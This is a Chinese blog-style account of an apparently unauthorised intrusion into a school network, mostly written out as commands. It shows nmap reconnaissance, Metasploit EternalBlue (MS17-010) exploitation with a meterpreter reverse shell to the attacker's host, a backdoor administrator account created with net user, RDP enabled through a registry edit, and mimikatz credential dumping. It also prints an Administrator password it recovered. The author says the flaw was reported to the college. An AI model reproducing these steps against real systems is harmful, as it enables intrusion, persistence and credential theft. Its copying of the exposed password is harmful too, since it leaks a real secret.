上课无聊划水的一次意外收获!!!

首先用NMAP扫描的时候,扫描出一个8888端口是http协议的。
于是我把查看了 网关IP拼接端口号 丢到了浏览器访问 (IP:8888);
suoga,,,果不其然是一个Ikuai路由管理后台。
BURP前去探路,爆破无果。(五此输入错误会锁定账户)
找了CVE,,,并且尝试利用。。发现漏洞不存在,,可能(搬迁机房)已经修复。

GET权限

2):服务器system权限获取
虽然拿不下路由权限,那么我们干脆换一种思路。
直接上NMAP简单的的信息收集一波,

1
nmap -sP 192.168.10.254/24

image1
扫描到目标机器。。

查看目标机器开放的信息(信息收集一波,知己知己百战不殆)

1
nmap -sV 192.168.10.240

image2

可以看出这是一台 winserver2008 R2 服务器 并且开放了445端口。
那么可以尝试cve MS017-010内网渗透。
查看本机IP
Kali攻击机IP
image3

接下来我们丢出美少妇,,就是一顿梭。。。

1
search ms17-010

iamge4

1
2
3
4
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.10.240
set rport 445
exploit

image5

漏洞利用

1
2
3
use exploit/windows/smb/ms17_010_eternablue
set payload windows/x64/meterpreter/reverse_tcp
show options

image6

设置参数

1
2
3
4
set rhost 192.168.10.240
set lhost 192.168.4.36
set lport 4444
show options

image7

EXPLOIT

失败)第一次 好像被动静有点大。。
服务器被打蓝屏了,,导致会话建立失败。

第二次,尝试,,会话反弹。。。
image8

WHOAMI??
image9

登录目标机器

登录win2008服务器
添加 administered用户Cat00011cat Cat_00011_cat

windows server 2008 R2 命令行的方式如何创建用户和设置密码

windows server 2008 R2 命令行的方式如何创建用户和设置密码

一、使用命令行的方式创建用户、设置密码

打开命令提示符

net user username password / add

例如:建立一个名为Cat00011cat、密码为Cat_00011_cat 的用户

1
net user Cat00011cat Cat_00011_cat /add

二、使用命令行修改旧帐户的密码

net user username password

例如:将用户Cat00011cat的密码设置为Cat_00011_cat

1
net user Cat00011cat Cat_00011_cat 

三、使用命令行的方式创建本地组

net localgroup groupname /add

例如:添加一个名为sales的组

net localgroup sales /add

四、使用命令行的方式为本地组

net localgroup groupname username /add

例如:将用户名Cat00011cat加入到administrators组中

1
net localgroup administrators Cat00011cat/ add

开启3389端口

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /

run getgui -e //直接开启3389服务

发现用自己创建的账户并不能登录到目标主机,,
给administrator权限也不行。。
不知道啥原因。。。

最后只能load mimi拿超级管理员账号,
拿去hash解密。。

超级管理员信息:
Administrator
King2019

拿下域控,点到为止。
iamge10
已上报学院协助修复